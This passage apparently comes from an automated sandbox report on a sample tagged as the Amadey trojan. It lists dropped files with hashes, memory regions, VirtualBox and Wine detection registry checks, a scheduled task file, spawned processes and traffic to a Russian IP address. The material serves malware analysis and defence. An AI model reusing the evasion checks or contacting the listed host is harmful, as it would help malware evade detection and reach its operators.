SHA512 9ff64d9a64464cdea8ded43e5538ab94688dc2859241165603173689243231e14055b1ac94cb1a82bc9d472aac91a814d189ddcc34a958eed143a8b7737cedb5

C:\Program Files (x86)\360\Total Security\safemon\routertp.ini

MD5 ecf50fa7bbdc571d09148864aa79421a
SHA1 cdd091720ea99e33f9383da1d6a97bd9ca5c6e20
SHA256 c07a3ffe5e7842f2ae9d6082c91cd8f07b838f281071ea400f3494e26392c435
SHA512 98a072344a0a925188957758fd46dc997bb124be88aec50aab8fd86b29857728043e17e772003e506fc4290387b7933c7f09015178807f191e79865d7081ffba

C:\Program Files (x86)\360\Total Security\safemon\netconfig.dat

MD5 777ff6adde1691c29fa51c86af9a34ee
SHA1 88fd4f2f882608a2c82570e7ccc2de27cbeedf23
SHA256 81227c030e55c82ca1c8c106aaae64317b4ab5f12a2167baed5c30db1855f35e
SHA512 9798fbd2b15abb384b5143517f220b3290d904028fff28774aa5e740514824ee56369bc230438d8c87235deb74e0857fdfaf9bb6a37e7e5e8b0914c6101eadc6

memory/1392-578-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ADVPACK.DLL

MD5 e98ce891b708859e0ced9d2a0ef5a24b
SHA1 76bedd4599ceb80f8289b1a7ac4f43a0f0ede87d
SHA256 7735dfb067c97033031d45593c320d1229f3acba896c1a4e815a2d1bfd786b11
SHA512 11c6ec18bf8ba8e2b8f4afaa442664c1c89b8026bb1bdba68391f380c0d3a8d35afc3f1a34ffc3643833e28437737dde2c80d3e185ac74c0dba42b54fe53c616

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rootsupd.inf

MD5 62e9fa5b395a827324a21052727f547e
SHA1 1af0fad2790531b8287eb5b1db5b8ddafb6d3571
SHA256 94fe83c96d71ca4e80b7426af32c7e02b784d6492b7b16405114b04f4ffc5464
SHA512 48a93e55e91cde8125714d45fc98180fe7127ef6ce7433ab43d4c09b0d4cea1543f941876e393bf99eac0dcdfae5106821acec86c86babfeaeb0a2f4711a55f3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\authroots.sst

MD5 b644618f556bd03f7814d2e601add3aa
SHA1 34ae3c398f0f193251ac611094a179eec0582696
SHA256 c2253ee4956864d38a6d85eb64470538950d3d25a6cdc9557b29482066e0cc46
SHA512 88f7be27cc1456dcc8354f455ef7c4c34d7e82cc9a38ec642d89d6d6c27abed80d7feb159dd96735b1b6674edcb642d8c3998b598775f90f02906db1610888e8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

MD5 9c18ae971cbffb096952177f6804ea31
SHA1 bb255dd1bd9bb39cdbb8671af66054432c686828
SHA256 2703c25453b09c40ee81fdc458b8cc24712e387a12d15ff94e12b02921fe98cb
SHA512 21086509bb4ea5afede55d034955de0bdf8b366d5d8d4bfa7a6c68b0f35fbf217ff3e932f87fc1d37f09022805e79ceeecbaf3dbccbd96d7c93029ffe7370e4c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.sst

MD5 81054e546a4d39396197048cdccbc295
SHA1 e97c1a03bce9135cc1c0b7d0022b572998f4fdb1
SHA256 a082b21d51a250eb8ee28825f4c7bd274a6078c0908d9af5c8e5c393715346b4
SHA512 654db218aefc769a2f69f5cc0022e18df0c2ca2b0b356cebe09b2b8cd8e57f2041101e0aa0b9225aa5c38bf1532e6611bef6b7ed02f169d54448055415cc44d4

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\roots.sst

MD5 8f5456ab98435524296b4dc4c4f82085
SHA1 26a71432ba446dd4c4d9c49dabe67ed7d31ee68a
SHA256 f66076a44618b4c21abedd1c792c79f7b3b11bc953a77d182aa3c821ff2d4a27
SHA512 0b39a1923308e17963ad5a367055782e1c9412487c443d177ec1b8cfed3716d04ed6afdf72a606b2844bb4baf159d526e2444ffa92ef63643bd9c21dfc57eac1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\delroots.sst

MD5 b190f095991ed6bda489ef38f69c25cb
SHA1 b8edd67d31b4a73ecf2a09233b72aa38c7b14247
SHA256 89e2b2b4daf76b8758c1313b91028e7a58340978df7442d4003849c4d6210c80
SHA512 a740dcf33db0cb77e49fe7964ede41a909728b57a543f3ad419ac822c1994837850a4f20bd7ea7a678d236dc2650ab23961bd264a41653805bbcc966a0e5e4ba

C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe

MD5 08063da816c5db77ce64807c4ec2f7e8
SHA1 61ded712f36458ba6ffcec37edbf65d5927d2d92
SHA256 dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e
SHA512 df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0

C:\Users\Admin\AppData\Local\Temp\7zSB35D.tmp\Install.exe

MD5 7d1dd60c4b8fb4167645f7093801b6d9
SHA1 4ae1feb130e57f803ef00709419e6226b7c0e54d
SHA256 1c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9
SHA512 7904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe

MD5 0550ef6afda33ea1c1a231b939ca9b07
SHA1 f74897166553b218e3a0869502ed036f175be9cd
SHA256 8462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb
SHA512 329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e

C:\ProgramData\360TotalSecurity\Logs\Administrators\netmon\netconn_s.dat

MD5 4bd814cc818656e523acfedc7613ba72
SHA1 bbd1c990581970b887999c751022dffca08667fb
SHA256 d1d3a33d3eaaaab5224584a318bad58f348c40f95bf1b04c0b61711030c8098d
SHA512 127deb85d1b3d52bd927f352bc843c92c8d54e5e210890263441c9f70db1499b83c6841b375302381431ebbd6e37e62d011000fcceda3bf87346fdf70370490c

memory/6012-655-0x0000000002860000-0x0000000002896000-memory.dmp

memory/6012-656-0x00000000054D0000-0x0000000005AF8000-memory.dmp

memory/6012-657-0x00000000053E0000-0x0000000005402000-memory.dmp

memory/6012-663-0x0000000005B00000-0x0000000005B66000-memory.dmp

memory/6012-668-0x0000000005CE0000-0x0000000006034000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/6012-670-0x0000000006390000-0x00000000063AE000-memory.dmp

memory/6012-673-0x00000000072F0000-0x0000000007312000-memory.dmp

memory/6012-672-0x00000000068C0000-0x00000000068DA000-memory.dmp

memory/6012-671-0x0000000007390000-0x0000000007426000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5315900105942deb090a358a315b06fe
SHA1 22fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256 e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA512 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f68c28f279faa46eacda72d80b395170
SHA1 8f8292dc1659d25a4310b26d61c3be67f990ac51
SHA256 b9655b8e1b327f4e2bc1fe06336768832242a2fb702f790bad1a36d28e638702
SHA512 63272f4b4e859d1e7446cc711e740823a801b0765e58b652dc11b0aa512cb7e6b3e9b33e1b2c6a7cf1e6c079d60ca8de0cc5d99357ded51522ae55e1957a013e

C:\Windows\ELAMBKUP\360elam64.sys

MD5 67e72ee5dcd6e2c69d9c1f457fd0e3c9
SHA1 1da65ca2fd47f10ec7eac55fdb5bfce19bb90de3
SHA256 7f3f8cde5989c7339f4862dd44ecd827fbf06d0ae6152c17907e27e822e0bf82
SHA512 d715cc1761a025e0df4296a4c37c4e799c6006dce6bf63215f9864cf853cc5f7917fd24baa1cac775e8b74005eebb6fc42b211876bf386af0062364c6ee2fd77

memory/3728-693-0x0000000007820000-0x00000000079E2000-memory.dmp

memory/3728-694-0x00000000091E0000-0x000000000970C000-memory.dmp

C:\Users\Admin\Pictures\DXQAsBMaYFTb6I0ZaoIOBg0a.exe

MD5 f30ed33de1f6dc4e2b9af5e9f36f92db
SHA1 aa1ae28162e4cbdccdd4c16cc9e2f9f7ed329425
SHA256 fa23ddba802b7c002f26ca21051b81af77f14ef0363d71dc5a1aad688dadbaf3
SHA512 16384ead55054170b9a1403122e35c32a0013f241542055305047cb91819a57c4533dcc95e0e6c9eca3653e8ddd81b40d6babad39107d0a64c95f1244822556b

memory/8-733-0x0000000004A50000-0x0000000004DA4000-memory.dmp

memory/8-743-0x0000000005390000-0x00000000053DC000-memory.dmp

memory/4876-758-0x00000000045E0000-0x0000000004934000-memory.dmp

memory/3184-783-0x0000000000400000-0x000000000046E000-memory.dmp

memory/5572-786-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3184-787-0x0000000008670000-0x00000000086BC000-memory.dmp

memory/5572-793-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\favicon.png

MD5 1603865df23efcd1dc421a48f090b2d5
SHA1 29c835478c413295787656da1201a3bd08582267
SHA256 fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512 e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1

memory/5024-796-0x000001E44E900000-0x000001E44E912000-memory.dmp

memory/5024-797-0x000001E44E7D0000-0x000001E44E7DA000-memory.dmp

memory/4824-826-0x0000000004390000-0x00000000046E4000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 686480f6d1c79d8c9062f99eedea28cc
SHA1 1ee0e9afcdc9d50d18f8e41688f06cdf377d0d69
SHA256 35b2f53c4f3ea6bc74803cfcc5154a4e1348000bc60f347a396bb90409e8d733
SHA512 eb422eb2f8772bb161fc5bf7b1953cf61de91b4dec7a5817e493907ceedcecb8b93d64eb7b055aa618703534f5a8ed51b33a29b7f5fe36e480971785daadd1de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\prefs.js

MD5 7487bc925ae29454214367e79c0db560
SHA1 39d0983adde1044d204e34fa177f2d73edb55873
SHA256 efcc99c59963478c7ff9ded7f07d08d5d174ded0bab326b4c57295658a412513
SHA512 67093bf14a527d7cf3ff25b0386b3d6ed2347413cadf775eff1e85995e6b5854be899591f89300b19fd9f97e6fb539d359d19e02905c173195bdd4b10c0fd923

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 eebb1d01ca366506fcbbba6db62ffb73
SHA1 0bffdbadfb80740cab088f887a183b6fe043c9ec
SHA256 84f527c10f34a693321974763ec278821716170b940b9269d9130d0d9cfa5fd8
SHA512 12178920e09b2fadf762a7686a7dee497ab9fac52898a33eccdf8b436fd863ba6972652b3c8a64eb302ffa655340f4e0a1d851890692e1bc3ef506f3388860b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 4d39c3c170cac6b614bc480af0e9d7c4
SHA1 73c817d78a2cf644e066059011dc038f358f36d2
SHA256 4cd2e07e72d0d301d99d8fbd4b7c283027417d0cf05471dcf01a0244a4a5e044
SHA512 756d20538f32cb6bb7717840f7dbe8565859c22af7e7b784819ffc14ca8a5aad02fb0fab7f3fce3600466c48f817a1ab59c6dde4f42e9de3901af2320771908f

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 02:56

Reported

2024-05-30 02:58

Platform

win11-20240426-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe | N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe

"C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

Network

Country | Destination | Domain | Proto
RU | 147.45.47.70:80 | 147.45.47.70 | tcp
US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp

Files

memory/3664-0-0x00000000007C0000-0x0000000000C69000-memory.dmp

memory/3664-1-0x0000000076ED6000-0x0000000076ED8000-memory.dmp

memory/3664-2-0x00000000007C1000-0x00000000007EF000-memory.dmp

memory/3664-3-0x00000000007C0000-0x0000000000C69000-memory.dmp

memory/3664-5-0x00000000007C0000-0x0000000000C69000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

MD5 a49d4ea8ceef49682b23f1308f5fce4b
SHA1 eed6afea70bb6655a8d1289ad072a186ee3ed1de
SHA256 cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA512 1efda3277e81e247645e48cd7cd0537d345cbff187bda289655e60d040d25d529f9f33988d2108321de6b0a387c254b989457a4bf30a1408a3ec162ac6ebdc70

memory/3664-16-0x00000000007C0000-0x0000000000C69000-memory.dmp

memory/720-18-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-19-0x0000000000E41000-0x0000000000E6F000-memory.dmp

memory/720-20-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-21-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-22-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-23-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-24-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-25-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-26-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-27-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-28-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-30-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-31-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-32-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-34-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-35-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-36-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-37-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-38-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-39-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-40-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/4496-42-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/4496-44-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-45-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-46-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-47-0x0000000000E40000-0x00000000012E9000-memory.dmp